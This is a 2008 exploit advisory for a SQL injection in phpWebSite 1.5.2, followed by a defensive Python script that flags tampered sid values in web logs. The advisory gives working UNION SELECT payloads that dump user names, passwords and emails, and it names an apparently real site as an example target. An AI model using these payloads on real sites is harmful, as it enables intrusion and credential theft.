[~]-------------------------------------------------------------------------------------------------------------
[~] phpWebSite 1.5.2 [article.php?sid] - SQL injection Vulnerability
[~]
[~] http://phpwebsite.appstate.edu/
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Bug found by d3v1l [Avram Marius]
[~]
[~] Date: 14.10.2008
[~]
[~] d3v1l@spoofer.com      http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/article.php?sid=-1 UNION SELECT 1,2,concat(name,char(58),pass,char(58),email),4,5,6,7,8 FROM users LIMIT 1,1/*
[~]
[~] http://site.com/article.php?sid=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8/*
[~]
[~] Example :-
[~]
[~] http://ares.ema.arrl.org/article.php?sid=SQL
[~]-------------------------------------------------------------------------------------------------------------
[~] btw: on some sites you need to use -> LIMIT 1,1/* when you want to get db information.
[~]-------------------------------------------------------------------------------------------------------------
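
Added example, not part of the original advisory: a log check that flags article.php requests whose decoded sid value is not a plain integer, which is how the requests above stand out in web server logs. It assumes combined-format access logs and that legitimate sid values are non-negative integers; the function name, sample lines and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Oct/2008:10:01:02 +0000] "GET /article.php?sid=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [14/Oct/2008:10:01:09 +0000] "GET /article.php?sid=-1%20UNION%20SELECT'
    '%201,2,concat(name,char(58),pass),4,5,6,7,8%20FROM%20users/* HTTP/1.1" 200 733',
    '198.51.100.9 - - [14/Oct/2008:10:01:15 +0000] "GET /article.php?sid=-1+union+select'
    '+1,2,version(),4,5,6,7,8/* HTTP/1.1" 200 701',
    '203.0.113.5 - - [14/Oct/2008:10:02:00 +0000] "GET /index.php?q=union+select HTTP/1.1" 200 900',
    '203.0.113.5 - - [14/Oct/2008:10:02:04 +0000] "GET /article.php?sid=12abc HTTP/1.1" 200 900',
]

# Client address, then the request target; ".+?" tolerates raw spaces in the URL.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Tokens used only to label a finding; the allowlist below decides what is flagged.
SQL_HINT = re.compile(r'\b(?:union|select|concat(?:_ws)?|from)\b|/\*|--', re.I)


def flag_sid_tampering(lines):
    """Return (client, decoded_sid, reason) for article.php requests with a non-integer sid."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/article.php"):
            continue
        # parse_qs percent-decodes and maps '+' to space, so encoded variants normalise.
        for sid in parse_qs(url.query, keep_blank_values=True).get("sid", []):
            if re.fullmatch(r"[0-9]+", sid):
                continue  # assumed legitimate form: a plain article id
            reason = "sql-syntax" if SQL_HINT.search(sid) else "non-numeric"
            findings.append((client, sid, reason))
    return findings


if __name__ == "__main__":
    for client, sid, reason in flag_sid_tampering(SAMPLE_LOG):
        print(f"{client}  {reason:11}  sid={sid!r}")
```

The same allowlist (accept only digits for sid) is the input check the application side needs before the value reaches a query.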